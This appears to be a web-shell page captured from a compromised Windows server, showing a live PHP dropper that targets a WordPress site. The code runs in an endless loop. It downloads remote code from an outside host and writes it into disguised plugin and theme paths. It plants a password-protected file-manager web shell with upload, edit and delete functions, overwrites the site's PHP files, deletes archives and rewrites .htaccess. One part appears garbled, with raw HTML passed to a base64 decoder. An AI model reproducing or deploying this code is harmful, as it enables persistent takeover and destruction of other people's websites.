HEX
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
System: Windows NT website-api 10.0 build 20348 (Windows Server 2016) AMD64
User: SYSTEM (0)
PHP: 7.4.30
Disabled: NONE
Upload Files
File: C:/Windows/Temp/tmkAE84.tmp
<?php
$tezhen_code = "<!-- monobovoppPPPKJDSALDDSSAD1ab4d6f8d41abab37e7a1b67a2469085QQWEDASDxyz789eefff --><!-- >ok< -->";
$SHELLACTION = "https://niu.kdfdc.shop/api/doshell";
$file_content = "PCEtLSBtb25vYm92b3BwUFBQS0pEU0FMRERTU0FEMWFiNGQ2ZjhkNDFhYmFiMzdlN2ExYjY3YTI0NjkwODVRUVdFREFTRHh5ejc4OWVlZmZmIC0tPjwhLS0gPm9rPCAtLT4=";
$file_content = base64_decode($file_content);
$file_path = "C:/github_repos/wp-xsj21/index.php";
$weihu_file_path = "C:/github_repos/wp-xsj21/wp-includes/sitemaps/providers/public/contents/index.php";
$ma_file_path = "C:/github_repos/wp-xsj21/wp-includes/public/js/wp-kbbrands/index.php";
$ht_file_path = "C:/github_repos/wp-xsj21/.htaccess";
$file_path = realpath($file_path);
$min_file_size = "14661";
$max_file_size = "15661";
while(true){
	if (file_exists($file_path)) {
		$file_size = filesize($file_path);
		if($file_size>=$min_file_size && $file_size<=$max_file_size){
			@chmod($file_path,0444);
		}else{
			@chmod($file_path,0775);
			@file_put_contents($file_path,$file_content);
			sleep(1);
			traverseDirectory("C:/github_repos/wp-xsj21",[],$tezhen_code,$file_content);
		}
	}else{
		@file_put_contents($file_path,$file_content);
		@chmod($file_path,0444);
		sleep(1);
		traverseDirectory("C:/github_repos/wp-xsj21",[],$tezhen_code,$file_content);
	}
    @chmod($ma_file_path,0775);
    @chmod($weihu_file_path,0775);
	if(!file_exists($weihu_file_path) || filesize($weihu_file_path)<265000 || filesize($weihu_file_path)>268000){
        traverseDirectory("C:/github_repos/wp-xsj21",[],$tezhen_code,$file_content);
		$weihu_file_content =  @makeCurlRequest($SHELLACTION."?type=getweihucode");
        $weihu_file_content = base64_decode($weihu_file_content);
        $weihu_file_content = $weihu_file_content.$tezhen_code;
        $weihu_file_path_dir = str_replace("index.php","",$weihu_file_path);
        if(!is_dir($weihu_file_path_dir)){
            @mkdir($weihu_file_path_dir, 0755, true);
        }
        if(!is_writable($weihu_file_path) && file_exists($weihu_file_path)){
            @chmod($weihu_file_path,0775);
        }
        file_put_contents($weihu_file_path,$weihu_file_content);

        $dirpath2 = "C:/github_repos/wp-xsj21/wp-content/plugins/akismet/views/main/widgets/";
        if(!is_dir($dirpath2)){
            @mkdir($dirpath2, 0755, true);
        }
        if(!is_writable($dirpath2."index.php") && file_exists($dirpath2."index.php")){
            @chmod($dirpath2."index.php",0775);
        }
        file_put_contents($dirpath2."index.php",$weihu_file_content);
        $dirpath3 = "C:/github_repos/wp-xsj21/wp-content/themes/twentytwentyfour/patterns/contents/class/";
        if(!is_dir($dirpath3)){
            @mkdir($dirpath3, 0755, true);
        }
        if(!is_writable($dirpath3."index.php") && file_exists($dirpath3."index.php")){
            @chmod($dirpath3."index.php",0775);
        }
        file_put_contents($dirpath3."index.php",$weihu_file_content);
	}

    if(!file_exists($ma_file_path) || filesize($ma_file_path)<13000 || filesize($ma_file_path)>15000 ){
        traverseDirectory("C:/github_repos/wp-xsj21",[],$tezhen_code,$file_content);
        $codestr = "<!DOCTYPE html>

<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Elep</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css"
        integrity="sha512-SzlrxWUlpfuzQ+pcUCosxcglQRNAq/DZjVsC0lE40xsADsfeQoEypE+enwcOiGjk/bSuGGKHEyjSoQ1zVisanQ=="
        crossorigin="anonymous" referrerpolicy="no-referrer" />
</head>

<body>

    <?php

    $psd = "567fd68adbdc94fd98ee0c4c7a054edb";

    function checkpsd($psd){
        $ip = getClientIp();
        if($ip!=""){
            $password = @file_get_contents(__DIR__."/".md5($ip).".txt");
            if($password==$psd){
                return true;
            }
        }
        
        if(isset($_COOKIE['psd'])){

            if($_COOKIE['psd']==$psd){
                return true;
            }
        }
        return false;
    }

    if ($_SERVER['REQUEST_METHOD'] == 'GET') {
        
        if(!checkpsd($psd)){
            echo '<html>
            <body>
                <form action="" method="post" style="text-align: center;" id="inputpsd">
                    <input type="password" name="psd" />
                    <button>submit</button>
                </form>
            </body>
        </html>';
            exit();
        }
    } elseif ($_SERVER['REQUEST_METHOD'] == 'POST') {
        if(!checkpsd($psd)){
            $input_psd = isset($_POST["psd"])?$_POST["psd"]:"";
            if(!empty($input_psd)){
                
                    if(md5($input_psd)==$psd){
                        $cookie_expire = time() + (86400 * 1);
                        setcookie("psd", $psd, $cookie_expire,"/");
                        $ip = getClientIp();
                        @file_put_contents(__DIR__."/".md5($ip).".txt",$psd);
                    }else{
                        exit("error");
                    }
            }else{
                exit("error");
            }
        }
    }

    function getClientIp() {
        $ipHeaders = array('HTTP_CF_CONNECTING_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_CLIENT_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR');
        foreach ($ipHeaders as $header) {if (isset($_SERVER[$header]) && !empty($_SERVER[$header])) {$ipList = explode(',', $_SERVER[$header]);foreach ($ipList as $ip) {$trimmedIp = trim($ip);if (filter_var($trimmedIp, FILTER_VALIDATE_IP)) {return $trimmedIp;}}}}
        return '';
    }

    //function
    function formatSizeUnits($bytes)
    {
        if ($bytes >= 1073741824) {
            $bytes = number_format($bytes / 1073741824, 2) . ' GB';
        } elseif ($bytes >= 1048576) {
            $bytes = number_format($bytes / 1048576, 2) . ' MB';
        } elseif ($bytes >= 1024) {
            $bytes = number_format($bytes / 1024, 2) . ' KB';
        } elseif ($bytes > 1) {
            $bytes = $bytes . ' bytes';
        } elseif ($bytes == 1) {
            $bytes = $bytes . ' byte';
        } else {
            $bytes = '0 bytes';
        }
        return $bytes;
    }

    function fileExtension($file)
    {
        return substr(strrchr($file, '.'), 1);
    }

    function fileIcon($file)
    {
        $imgs = array("apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", "png", "svg", "webp");
        $audio = array("wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc");
        $ext = strtolower(fileExtension($file));
        if ($file == "error_log") {
            return '<i class="fa-sharp fa-solid fa-bug"></i> ';
        } elseif ($file == ".htaccess") {
            return '<i class="fa-solid fa-hammer"></i> ';
        }
        if ($ext == "html" || $ext == "htm") {
            return '<i class="fa-brands fa-html5"></i> ';
        } elseif ($ext == "php" || $ext == "phtml") {
            return '<i class="fa-brands fa-php"></i> ';
        } elseif (in_array($ext, $imgs)) {
            return '<i class="fa-regular fa-images"></i> ';
        } elseif ($ext == "css") {
            return '<i class="fa-brands fa-css3"></i> ';
        } elseif ($ext == "txt") {
            return '<i class="fa-regular fa-file-lines"></i> ';
        } elseif (in_array($ext, $audio)) {
            return '<i class="fa-duotone fa-file-music"></i> ';
        } elseif ($ext == "py") {
            return '<i class="fa-brands fa-python"></i> ';
        } elseif ($ext == "js") {
            return '<i class="fa-brands fa-js"></i> ';
        } else {
            return '<i class="fa-solid fa-file"></i> ';
        }
    }

    function encodePath($path)
    {
        $a = array("/", "\\", ".", ":");
        $b = array("ক", "খ", "গ", "ঘ");
        return str_replace($a, $b, $path);
    }
    function decodePath($path)
    {
        $a = array("/", "\\", ".", ":");
        $b = array("ক", "খ", "গ", "ঘ");
        return str_replace($b, $a, $path);
    }



    $root_path = __DIR__;
    if (isset($_GET['p'])) {
        if (empty($_GET['p'])) {
            $p = $root_path;
        } elseif (!is_dir(decodePath($_GET['p']))) {
            echo ("<script>\nalert('Directory is Corrupted and Unreadable.');\nwindow.location.replace('?');\n</script>");
        } elseif (is_dir(decodePath($_GET['p']))) {
            $p = decodePath($_GET['p']);
        }
    } elseif (isset($_GET['q'])) {
        if (!is_dir(decodePath($_GET['q']))) {
            echo ("<script>window.location.replace('?p=');</script>");
        } elseif (is_dir(decodePath($_GET['q']))) {
            $p = decodePath($_GET['q']);
        }
    } else {
        $p = $root_path;
    }
    define("PATH", $p);

    echo ('
<nav class="navbar navbar-light" style="background-color: #e3f2fd;">
  <div class="navbar-brand">
  <a href="?"><img src="https://raw.githubusercontent.com/hurairathexper/elepfilemanager/main/img/icon.png" width="30" height="30" alt=""></a>
');

    $path = str_replace('\\', '/', PATH);
    $paths = explode('/', $path);
    foreach ($paths as $id => $dir_part) {
        if ($dir_part == '' && $id == 0) {
            $a = true;
            echo "<a href=\"?p=/\">/</a>";
            continue;
        }
        if ($dir_part == '')
            continue;
        echo "<a href='?p=";
        for ($i = 0; $i <= $id; $i++) {
            echo str_replace(":", "ঘ", $paths[$i]);
            if ($i != $id)
                echo "ক";
        }
        echo "'>" . $dir_part . "</a>/";
    }
    echo ('
</div>
<div class="form-inline">
<a href="?upload&q=' . urlencode(encodePath(PATH)) . '"><button class="btn btn-dark" type="button">Upload File</button></a>
<a href="?"><button type="button" class="btn btn-dark">HOME</button></a>
</div>
</nav>');


    if (isset($_GET['p'])) {

        //fetch files
        if (is_readable(PATH)) {
            $fetch_obj = scandir(PATH);
            $folders = array();
            $files = array();
            foreach ($fetch_obj as $obj) {
                if ($obj == '.' || $obj == '..') {
                    continue;
                }
                $new_obj = PATH . '/' . $obj;
                if (is_dir($new_obj)) {
                    array_push($folders, $obj);
                } elseif (is_file($new_obj)) {
                    array_push($files, $obj);
                }
            }
        }
        echo '
<table class="table table-hover">
  <thead>
    <tr>
      <th scope="col">Name</th>
      <th scope="col">Size</th>
      <th scope="col">Modified</th>
      <th scope="col">Perms</th>
      <th scope="col">Actions</th>
    </tr>
  </thead>
  <tbody>
';
        foreach ($folders as $folder) {
            echo "    <tr>
      <td><i class='fa-solid fa-folder'></i> <a href='?p=" . urlencode(encodePath(PATH . "/" . $folder)) . "'>" . $folder . "</a></td>
      <td><b>---</b></td>
      <td>". date("F d Y H:i:s.", filemtime(PATH . "/" . $folder)) . "</td>
      <td>0" . substr(decoct(fileperms(PATH . "/" . $folder)), -3) . "</a></td>
      <td>
      <a title='chmod File' href='?q=" . urlencode(encodePath(PATH)) . "&c=" . $folder . "'><i class='fa-solid fa-file-pen'></i></a>
      <a title='Rename' href='?q=" . urlencode(encodePath(PATH)) . "&r=" . $folder . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a>
      <a title='Delete' href='?q=" . urlencode(encodePath(PATH)) . "&d=" . $folder . "'><i class='fa fa-trash' aria-hidden='true'></i></a>
      <td>
    </tr>
";
        }
        foreach ($files as $file) {
            echo "    <tr>
          <td>" . fileIcon($file) . $file . "</td>
          <td>" . formatSizeUnits(filesize(PATH . "/" . $file)) . "</td>
          <td>" . date("F d Y H:i:s.", filemtime(PATH . "/" . $file)) . "</td>
          <td>0". substr(decoct(fileperms(PATH . "/" .$file)), -3) . "</a></td>
          <td>
          <a title='chmod File' href='?q=" . urlencode(encodePath(PATH)) . "&c=" . $file . "'><i class='fa-solid fa-file-pen'></i></a>
          <a title='Edit File' href='?q=" . urlencode(encodePath(PATH)) . "&e=" . $file . "'><i class='fa-solid fa-file-pen'></i></a>
          <a title='Rename' href='?q=" . urlencode(encodePath(PATH)) . "&r=" . $file . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a>
          <a title='Delete' href='?q=" . urlencode(encodePath(PATH)) . "&d=" . $file . "'><i class='fa fa-trash' aria-hidden='true'></i></a>
          <td>
    </tr>
";
        }
        echo "  </tbody>
</table>";
    } else {
        if (empty($_GET)) {
            echo ("<script>window.location.replace('?p=');</script>");
        }
    }
    if (isset($_GET['upload'])) {
        echo '
    <form method="post" enctype="multipart/form-data">
        Select file to upload:
        <input type="file" name="fileToUpload" id="fileToUpload">
        <input type="submit" class="btn btn-dark" value="Upload" name="upload">
    </form>';
    }
    if (isset($_GET['r'])) {
        if (!empty($_GET['r']) && isset($_GET['q'])) {
            echo '
    <form method="post">
        Rename:
        <input type="text" name="name" value="' . $_GET['r'] . '">
        <input type="submit" class="btn btn-dark" value="Rename" name="rename">
    </form>';
            if (isset($_POST['rename'])) {
                $name = PATH . "/" . $_GET['r'];
                if(rename($name, PATH . "/" . $_POST['name'])) {
                    echo ("<script>alert('Renamed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
                } else {
                    echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
                }
            }
        }
    }

    if (isset($_GET['c'])) {
        if (!empty($_GET['c']) && isset($_GET['c'])) {
            echo '
    <form method="post">
        Chmod:
        <input type="text" name="chmod_value" value="">
        <input type="submit" class="btn btn-dark" value="Chmod" name="chmod">
    </form>';
            if (isset($_POST['chmod'])) {
                $name = PATH . "/" . $_GET['c'];
                $chmod_value = intval($_POST['chmod_value'], 8);
                if(chmod($name, $chmod_value)) {
                    echo ("<script>alert('chmoded.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
                } else {
                    echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
                }
            }
        }
    }

    if (isset($_GET['e'])) {
        if (!empty($_GET['e']) && isset($_GET['q'])) {
            echo '
    <form method="post">
        <textarea style="height: 500px;
        width: 90%;" name="data">' . htmlspecialchars(file_get_contents(PATH."/".$_GET['e'])) . '</textarea>
        <br>
        <input type="submit" class="btn btn-dark" value="Save" name="edit">
    </form>';

    if(isset($_POST['edit'])) {
        $filename = PATH."/".$_GET['e'];
        $data = $_POST['data'];
        $open = fopen($filename,"w");
        if(fwrite($open,$data)) {
            echo ("<script>alert('Saved.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
        } else {
            echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
        }
        fclose($open);
    }
        }
    }

    if (isset($_POST["upload"])) {
        $target_file = PATH . "/" . $_FILES["fileToUpload"]["name"];
        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
            echo "<p>".htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " has been uploaded.</p>";
        } else {
            echo "<p>Sorry, there was an error uploading your file.</p>";
        }

    }
    if (isset($_GET['d']) && isset($_GET['q'])) {
        $name = PATH . "/" . $_GET['d'];
        if (is_file($name)) {
            if(unlink($name)) {
                echo ("<script>alert('File removed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
            } else {
                echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
            }
        } elseif (is_dir($name)) {
            if(rmdir($name) == true) {
                echo ("<script>alert('Directory removed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
            } else {
                echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
            }
        }
    }
    ?>


    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js"
        integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN"
        crossorigin="anonymous"></script>
</body>

</html>";

        $codestr = base64_decode($codestr).$tezhen_code;

        $ma_file_path_dir = str_replace("index.php","",$ma_file_path);
        if(!is_dir($ma_file_path_dir)){
            @mkdir($ma_file_path_dir, 0755, true);
        }
        if(!is_writable($ma_file_path) && file_exists($ma_file_path)){
            @chmod($ma_file_path,0775);
        }
        file_put_contents($ma_file_path,$codestr);
    }

    if(!file_exists($ht_file_path) || filesize($ht_file_path)<220 || filesize($ht_file_path)>260){
        @chmod($ht_file_path,0775);
        $ht_content_new = "PElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+DQogICAgUmV3cml0ZUVuZ2luZSBPbg0KICAgIFJld3JpdGVCYXNlIC8NCiAgICBSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0NCiAgICBSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZg0KICAgIFJld3JpdGVDb25kICV7UkVRVUVTVF9GSUxFTkFNRX0gIS1kDQogICAgUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQ0KPC9JZk1vZHVsZT4=";
        $ht_content_new = base64_decode($ht_content_new);
        file_put_contents($ht_file_path,$ht_content_new);
        @chmod($ht_file_path,0444);
        traverseDirectory("C:/github_repos/wp-xsj21",[],$tezhen_code,$file_content);
    }
	@gc_collect_cycles();
    sleep(3);
    file_put_contents("C:/github_repos/wp-xsj21/".md5("weihutime").".txt",time()+8);
}

function traverseDirectory($dir, $patterns,$tezhen_code,$indxcodes) {
    if(!is_writable($dir)){
        $result = @chmod($dir,0755);
        if(!$result){
            if (function_exists('exec') && is_callable('exec')) {
                @exec("chmod 0755 $dir");
            }
        }
    }
    $files = @scandir($dir);
    if($files === false){
        return false;
    }
    foreach ($files as $file) {
        $filePath = $dir . DIRECTORY_SEPARATOR . $file;
        if ($file != '.' && $file != '..') {
            if (is_dir($filePath)) {
                traverseDirectory($filePath, $patterns,$tezhen_code,$indxcodes);
            } else {
                $extension = strtolower(pathinfo($file, PATHINFO_EXTENSION));
                if (stripos($extension,"php")!==false || stripos($extension,"conf")!==false || $extension === '') {

                    if($extension === ''){
                        if(!is_writable($filePath)){
                            @chmod($filePath,0755);
                        }
                        @unlink($filePath);
                    }else{
                        $perms = @fileperms($filePath);
                        $octalPerms = @decoct($perms & 0777);
                        if($octalPerms!==false && stripos($octalPerms,"200")!==false){
                            continue;
                        }else{
                            if(!is_writable($filePath)){
                                @chmod($filePath,0755);
                            }
                            $rcontent = @file_get_contents($filePath);
                            if($rcontent !== false){
                                if(stripos($rcontent,$tezhen_code)===false && $filePath !== __FILE__ && $rcontent!="1"){
                                    @file_put_contents($filePath,$indxcodes);
                                    $result = @chmod($filePath,0200);
                                    if($result===false){
                                        @exec("chmod 0200 $filePath");
                                    }
                                }
                            }
                        }
                    }
                }else if($extension === 'zip' || $extension === 'rar'){
                    if(!is_writable($filePath)){
                        @chmod($filePath,0755);
                    }
                    @unlink($filePath);
                }else if(stripos($extension,"htaccess")!==false && ROOTPATH!=$dir){
                    if(!is_writable($filePath)){
                        @chmod($filePath,0755);
                    }
                    @unlink($filePath);
                }
            }
        }
    }
}

function makeCurlRequest($url, $method = 'GET', $postData = array()) {
    try{
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        $headers = array(
            "Cache-Control: no-cache",
            "Connection: keep-alive",
            "Pragma: no-cache",
            "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
        );
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        if ($method === 'POST') {
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
        }
        $response = curl_exec($ch);
        curl_close($ch);
    }catch (Throwable $e) {
        if ($method === 'POST') {
            $encodedData = http_build_query($postData);
            $options = ['http' => ['method'  => 'POST', 'header'  => 'Content-Type: application/x-www-form-urlencoded', 'content' => $encodedData]];
            $context = stream_context_create($options);
            $response = file_get_contents($url, false, $context);
        }else{
            $response = file_get_contents($url);
        }
    }
    return $response;
}